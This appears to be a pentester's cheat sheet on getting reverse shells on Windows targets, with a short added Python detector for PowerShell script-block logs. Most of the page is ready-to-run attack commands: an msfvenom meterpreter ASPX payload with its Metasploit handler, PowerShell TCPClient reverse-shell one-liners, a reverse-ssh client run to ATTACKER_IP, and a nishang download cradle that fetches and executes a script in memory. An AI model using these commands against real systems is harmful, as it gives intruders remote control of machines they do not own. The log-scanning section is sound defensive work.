Shells
Normal Shells
Meterpreter
First, generate a file that, when executed, starts a reverse shell on the target host. Here's an example of an ASPX shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.14.73" LPORT=4444 -f aspx -o reverse.aspx
Then, on your attacker machine, start Metasploit and set up a handler:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 10.10.14.73
run
Replace the IP address and port with your own, of course.
Interactive Powershell Reverse Shell
Caveat: stderr doesn't work!
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('IP_ADDRESS_HERE', PORT_NUMBER_HERE);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Full TTY Shells
Pwncat
Caveat: I've tested it on 2 Windows boxes in HTB, and it didn't work in either one.
Probably a good idea to switch to bash if using ZSH:
exec bash --login
If your target machine doesn't have internet access, then you'll need to download the plugins first:
pwncat --download-plugins
Listen on port 4444:
pwncat -m windows -lp 4444
Then connect to pwncat with either a powershell.exe or cmd.exe reverse shell (adjust the IP address and port in the one-liner so they match your listener):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Reverse SSH Shell
Features:
Full TTY shell
File sharing via SFTP
Port forwarding
At least Windows 7 or Windows Server 2008 (Windows 10 for ConPTY; lower Windows versions need a workaround for full TTY functionality)
Linux kernel version 2.6.23 and higher
Caveats:
SCP doesn't seem to work
SSH port forwarding doesn't seem to work
It hangs sometimes
Evades antivirus: Don't know
First run this on your machine:
./reverse-ssh -v -l :4444
Then run the following on the victim machine (you can use the UPX-packed executable; use ssh-shellhost on older machines):
.\upx_reverse-sshx86.exe -p 4444 kali@ATTACKER_IP
And finally on your machine:
ssh -p 8888 127.0.0.1
The default password is letmeinbrudipls.
NB! If the target doesn't have ConPTY (pre-Windows 10 build 17763), then you need the following workaround:
upx_reverse-sshx86.exe -p 4444 -s ssh-shellhost.exe kali@ATTACKER_IP
The ssh-shellhost.exe executable needs to be in the same directory. It's an executable from OpenSSH.
Rlwrap with nishang
Serve the script from your machine, then download the nishang shell into memory:
powershell iex (New-Object Net.WebClient).DownloadString('http://IP:PORT/Invoke-PowerShellTcp.ps1');
Start a listener on SOME_PORT on the attacker machine. Use rlwrap as explained here (not tested).
Then run the reverse shell.
Invoke-PowerShellTcp -Reverse -IPAddress ATTACKER_IP -Port SOME_PORT
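As an added example from the defensive side (not code from the original page): a small scanner over PowerShell Script Block Logging events (Event ID 4104) that flags the TCPClient one-liner used in the Interactive PowerShell and Pwncat sections above, and the download cradle plus Invoke-PowerShellTcp used in this nishang section. The event field names, rule names and sample events are constructed for this example.

```python
import re
# Indicators taken from the one-liners on this page (case-insensitive, as PowerShell is).
INDICATORS = [
    ("tcpclient", re.compile(r"New-Object\s+(System\.)?Net\.Sockets\.TCPClient", re.I)),
    ("getstream", re.compile(r"\.GetStream\(\)", re.I)),
    ("iex", re.compile(r"(?<![\w-])(iex|Invoke-Expression)\b", re.I)),
    ("downloadstring", re.compile(r"\.DownloadString\(", re.I)),
    ("nishang", re.compile(r"Invoke-PowerShellTcp", re.I)),
]
# One indicator alone is noisy (iex is common in admin scripts); alert only on combinations.
RULES = {
    "interactive-reverse-shell": {"tcpclient", "getstream", "iex"},
    "download-cradle": {"downloadstring", "iex"},
    "nishang-reverse-shell": {"nishang"},
}

def classify(script_block: str) -> list[str]:
    """Return the rule names matched by one ScriptBlockText value."""
    hits = {name for name, pat in INDICATORS if pat.search(script_block)}
    return sorted(rule for rule, needed in RULES.items() if needed <= hits)

def scan_events(events: list[dict]) -> list[dict]:
    """Scan Script Block Logging events; only Event ID 4104 carries script text."""
    findings = []
    for ev in events:
        if str(ev.get("EventID")) != "4104":
            continue
        rules = classify(str(ev.get("ScriptBlockText", "")))
        if rules:
            findings.append({"RecordId": ev["RecordId"], "rules": rules})
    return findings

# Constructed sample events, not real logs: record 2 is the TCPClient one-liner
# from this page trimmed to its core, record 3 is the nishang download cradle.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 4104,
     "ScriptBlockText": "Get-ChildItem C:\\Logs -Recurse | Where-Object { $_.Length -gt 1MB }"},
    {"RecordId": 2, "EventID": 4104,
     "ScriptBlockText": "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444);"
                        "$stream = $client.GetStream();while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0)"
                        "{$sendback = (iex $data 2>&1 | Out-String)}"},
    {"RecordId": 3, "EventID": 4104,
     "ScriptBlockText": "iex (New-Object Net.WebClient).DownloadString('http://10.0.0.1:8000/Invoke-PowerShellTcp.ps1')"},
    {"RecordId": 4, "EventID": 4103, "ScriptBlockText": "New-Object System.Net.Sockets.TCPClient"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"record {f['RecordId']}: {', '.join(f['rules'])}")
```

Record 4 is deliberately a different event ID to show that only script block events are inspected; in a real deployment the events would come from the Microsoft-Windows-PowerShell/Operational log.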
Socat
I think socat can be used to make a decent reverse shell?